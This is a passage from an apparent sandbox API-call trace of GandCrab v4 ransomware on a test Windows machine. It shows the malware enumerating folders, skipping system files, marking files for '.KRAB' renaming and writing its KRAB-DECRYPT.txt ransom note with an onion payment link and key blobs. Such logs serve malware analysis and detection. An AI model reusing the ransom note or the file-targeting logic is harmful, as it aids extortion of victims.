lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt" [0059.779] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.779] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt.KRAB") returned 100 [0059.779] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 95 [0059.779] lstrlenW (lpString=".txt") returned 4 [0059.779] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.780] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.780] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.780] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 95 [0059.780] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\KRAB-DECRYPT.txt") returned 95 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.780] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.780] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.781] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.781] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2=".") returned 1 [0059.781] lstrcmpW (lpString1="Microsoft Outlook.lnk", lpString2="..") returned 1 [0059.781] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Microsoft Outlook.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" [0059.781] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.781] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk.KRAB") returned 105 [0059.781] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk") returned 100 [0059.781] lstrlenW (lpString=".lnk") returned 4 [0059.781] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.782] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0059.782] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.782] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.782] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.782] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0059.782] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0059.782] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Shows Desktop.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" [0059.782] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.783] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.KRAB") returned 101 [0059.783] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 96 [0059.783] lstrlenW (lpString=".lnk") returned 4 [0059.783] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.783] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lnk ") returned 5 [0059.783] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.783] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.784] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.784] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0059.784] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0059.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0059.784] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0059.784] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.784] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.784] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.785] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.785] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\KRAB-DECRYPT.txt") returned 108 [0059.785] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0059.789] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.789] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.790] CloseHandle (hObject=0x448) returned 1 [0059.793] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.794] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.794] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x3e1)) [0059.794] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.795] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.795] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.795] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock") returned 114 [0059.795] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0059.798] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.798] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.798] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 91 [0059.798] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0059.799] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd4a0 [0059.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.799] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.799] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.799] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.799] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock" [0059.799] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.799] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 119 [0059.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\d2ca4a08d2ca4dee3d.lock") returned 114 [0059.799] lstrlenW (lpString=".lock") returned 5 [0059.799] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.800] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.800] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.800] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.800] FindNextFileW (in: hFindFile=0xfbd4a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0059.800] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0059.800] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0059.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0059.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0059.801] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.801] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.801] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.801] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.802] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\KRAB-DECRYPT.txt") returned 129 [0059.802] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0059.804] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bM